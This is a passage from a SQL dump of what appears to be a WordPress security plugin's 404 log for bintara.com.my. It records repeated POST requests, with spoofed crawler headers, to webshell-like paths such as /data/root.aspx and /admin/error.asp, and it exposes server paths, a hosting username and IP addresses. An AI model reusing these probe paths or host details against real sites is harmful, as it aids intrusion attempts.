Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"221.6.113.228\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"221.6.113.228\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/A-LlobetPics.rar.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-T466CYj3S7An3VFFrsAAAAUI\";s:12:\"REDIRECT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50671\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/A-LlobetPics.rar.asp\";s:10:\"SCRIPT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-T466CYj3S7An3VFFrsAAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804131.2879\";s:12:\"REQUEST_TIME\";s:10:\"1571804131\";}}','notice','2019-10-23 04:15:35','2019-10-23 04:15:31',35342280,37139376,'http://bintara.com.my//A-LlobetPics.rar.asp',1,0,'221.6.113.228'),(28814,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//A-LlobetPics.rar.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.49.126.186\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.49.126.186\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/A-LlobetPics.rar.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-T8O4vBmywCERyagfsiwAAAQs\";s:12:\"REDIRECT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/A-LlobetPics.rar.asp\";s:10:\"SCRIPT_URL\";s:21:\"/A-LlobetPics.rar.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-T8O4vBmywCERyagfsiwAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804144.7219\";s:12:\"REQUEST_TIME\";s:10:\"1571804144\";}}','notice','2019-10-23 04:15:47','2019-10-23 04:15:45',35265912,37065560,'http://bintara.com.my//A-LlobetPics.rar.asp',1,0,'59.49.126.186'),(28815,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//data/root.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"123.56.92.124\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"123.56.92.124\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/data/root.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/data/root.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-T9u4vBmywCERyagfsjAAAAQw\";s:12:\"REDIRECT_URL\";s:15:\"/data/root.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/data/root.aspx\";s:10:\"SCRIPT_URL\";s:15:\"/data/root.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-T9u4vBmywCERyagfsjAAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804150.8915\";s:12:\"REQUEST_TIME\";s:10:\"1571804150\";}}','notice','2019-10-23 04:15:53','2019-10-23 04:15:51',35343456,37149616,'http://bintara.com.my//data/root.aspx',1,0,'123.56.92.124'),(28816,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//data/root.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.82.251.124\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.82.251.124\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/data/root.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/data/root.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-T@u4vBmywCERyagfsjQAAAQ0\";s:12:\"REDIRECT_URL\";s:15:\"/data/root.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/data/root.aspx\";s:10:\"SCRIPT_URL\";s:15:\"/data/root.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-T@u4vBmywCERyagfsjQAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804154.7416\";s:12:\"REQUEST_TIME\";s:10:\"1571804154\";}}','notice','2019-10-23 04:15:56','2019-10-23 04:15:55',35266416,37059888,'http://bintara.com.my//data/root.aspx',1,0,'58.82.251.124'),(28817,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//ietgl/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.201.113.255\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.201.113.255\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/ietgl/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/ietgl/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UC@4vBmywCERyagfskgAAAQk\";s:12:\"REDIRECT_URL\";s:16:\"/ietgl/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/ietgl/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/ietgl/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UC@4vBmywCERyagfskgAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804171.4944\";s:12:\"REQUEST_TIME\";s:10:\"1571804171\";}}','notice','2019-10-23 04:16:13','2019-10-23 04:16:11',35344368,37142656,'http://bintara.com.my//ietgl/index.asp',1,0,'202.201.113.255'),(28818,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//ietgl/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.186.167.167\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.186.167.167\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/ietgl/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/ietgl/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UFa6CYj3S7An3VFFrzgAAAVc\";s:12:\"REDIRECT_URL\";s:16:\"/ietgl/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52087\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/ietgl/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/ietgl/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UFa6CYj3S7An3VFFrzgAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804181.7921\";s:12:\"REQUEST_TIME\";s:10:\"1571804181\";}}','notice','2019-10-23 04:16:23','2019-10-23 04:16:22',35269432,37075272,'http://bintara.com.my//ietgl/index.asp',1,0,'61.186.167.167'),(28819,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/error.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"122.102.31.196\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"122.102.31.196\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/error.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/error.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-ULOHARMCuuKQiJT-9IAAAANY\";s:12:\"REDIRECT_URL\";s:16:\"/admin/error.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/error.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/error.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-ULOHARMCuuKQiJT-9IAAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804204.2694\";s:12:\"REQUEST_TIME\";s:10:\"1571804204\";}}','notice','2019-10-23 04:16:46','2019-10-23 04:16:44',35340352,37134008,'http://bintara.com.my//admin/error.asp',1,0,'122.102.31.196'),(28820,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/error.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.97.101.157\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.97.101.157\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/error.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/error.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UOOHARMCuuKQiJT-9IwAAANA\";s:12:\"REDIRECT_URL\";s:16:\"/admin/error.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53013\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/error.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/error.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UOOHARMCuuKQiJT-9IwAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804217.1195\";s:12:\"REQUEST_TIME\";s:10:\"1571804217\";}}','notice','2019-10-23 04:16:59','2019-10-23 04:16:57',35269432,37075272,'http://bintara.com.my//admin/error.asp',1,0,'211.97.101.157'),(28821,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//cert/com1.dfsdf.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"122.13.224.52\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"122.13.224.52\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/cert/com1.dfsdf.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-UPeHARMCuuKQiJT-9JAAAAMg\";s:12:\"REDIRECT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53013\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/cert/com1.dfsdf.asp\";s:10:\"SCRIPT_URL\";s:20:\"/cert/com1.dfsdf.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-UPeHARMCuuKQiJT-9JAAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804221.5555\";s:12:\"REQUEST_TIME\";s:10:\"1571804221\";}}','notice','2019-10-23 04:17:03','2019-10-23 04:17:02',35341136,37141416,'http://bintara.com.my//cert/com1.dfsdf.asp',1,0,'122.13.224.52'),(28822,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//cert/com1.dfsdf.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 